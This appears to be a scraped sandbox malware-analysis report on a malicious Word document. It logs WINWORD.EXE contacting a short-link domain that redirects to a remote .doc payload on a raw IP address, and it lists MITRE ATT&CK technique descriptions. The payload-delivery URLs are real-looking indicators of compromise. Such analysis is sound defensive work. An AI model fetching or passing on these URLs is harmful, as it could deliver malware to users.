{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GC9rWX4Sv4%2Bq7PQsjv9PcgL2ETSN2ZYdAe0JOxabuuMG2O2MJrNMqyJt%2BS8eiDn%2FUSVaH5cewkylWVjBkgruUU2MXHoM4vVDBqf9WyDHCVJ5YsFca5xtf1rXpv8pzA%3D%3D"}],"group":"cf-nel","max_age":604800} Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=99217&min_rtt=98234&rtt_var=21695&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=924&delivery_rate=37870&cwnd=244&unsent_bytes=0&cid=40fc4d68e7ff3d7f&ts=548&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49689	104.21.47.51	443	6820	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2025-04-02 09:55:37 UTC	175	OUT	GET /3ri5DVX HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Host: kuhlinks.de Connection: Keep-Alive
2025-04-02 09:55:37 UTC	1198	IN	HTTP/1.1 302 Found Date: Wed, 02 Apr 2025 09:55:37 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 192 Connection: close Cf-Ray: 929f739f4ef141b4-EWR Server: cloudflare Location: http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Cf-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2opLjPSazyl6sKwsuGayIP1na1CBNgSe3ytBoAUzSEpJ0F%2FmVnm4yNqv%2Fyo%2BMuBXxzLfXU8rwh%2BIkugdv2c5pd4avrzxun3erNRTp6L5ajQ6X49y7lXN8pmCblWz9g%3D%3D"}],"group":"cf-nel","max_age":604800} Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=97669&min_rtt=97565&rtt_var=20742&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=757&delivery_rate=38055&cwnd=247&unsent_bytes=0&cid=46a3bfc30e9e73d8&ts=561&x=0"
2025-04-02 09:55:37 UTC	171	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 31 36 2e 39 2e 32 32 34 2e 31 38 35 2f 31 32 32 2f 77 65 6e 64 2f 73 77 65 63 61 6e 69 6e 73 65 72 74 66 6f 72 67 6f 6f 64 66 6f 72 65 65 74 75 72 6e 63 68 65 63 6c 6b 67 6f 6f 64 77 65 63 61 6e 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 77 65 63 61 6e 69 6e 73 65 72 74 66 6f 72 67 6f 6f 64 66 6f 72 65 65 74 75 72 6e 63 68 65 63 6c 6b 67 6f 6f 64 5f 5f 5f 5f 5f 5f 5f 5f 77 65 63 61 6e 69 6e 73 65 72 74 66 6f 72 67 6f 6f 64 66 6f Data Ascii: Found. Redirecting to http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodfo
2025-04-02 09:55:37 UTC	21	IN	Data Raw: 72 65 65 74 75 72 6e 63 68 65 63 6c 6b 67 6f 6f 64 2e 64 6f 63 Data Ascii: reeturncheclkgood.doc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49694	104.21.47.51	443	6820	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2025-04-02 09:55:40 UTC	213	OUT	HEAD /3ri5DVX HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: kuhlinks.de Connection: Keep-Alive
2025-04-02 09:55:41 UTC	1194	IN	HTTP/1.1 302 Found Date: Wed, 02 Apr 2025 09:55:41 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 192 Connection: close location: http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc strict-transport-security: max-age=15552000; includeSubDomains vary: Accept x-content-type-options: nosniff x-dns-prefetch-control: off x-download-options: noopen x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WMOJY0oXkBd668L6jwE7NKPzmU8jMS3p4bRv1%2BNkAdOTuuRe6LBOZhvKlWYdOUeJoojArB0API0fyShWsI0%2FNWkrahV4uwOePEQTI90pOJEXXphQSwLW8vhxg3uJWw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 929f73b41d0606a1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=99018&min_rtt=98680&rtt_var=21147&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=827&delivery_rate=37741&cwnd=212&unsent_bytes=0&cid=64f40e15ae302632&ts=592&x=0"

Statistics

CPU Usage

• WINWORD.EXE

Click to jump to process

Memory Usage

• WINWORD.EXE

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Target ID:	0
Start time:	05:55:27
Start date:	02/04/2025
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x700000
File size:	1'620'872 bytes
MD5 hash:	1A0C2C2E7D9C4BC18E91604E9B0C7678
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IMP 7527518303 2507294.docx.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Desktop\IMP 7527518303 2507294.docx.doc (copy)

C:\Users\user\Desktop\~$P 7527518303 2507294.docx.doc

C:\Users\user\Desktop\~WRD0000.tmp

C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

Static File Info

General

File Icon

Static OLE Info

General

OLE File "IMP 7527518303 2507294.docx.doc"

Indicators

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Windows Analysis Report
IMP 7527518303 2507294.docx.doc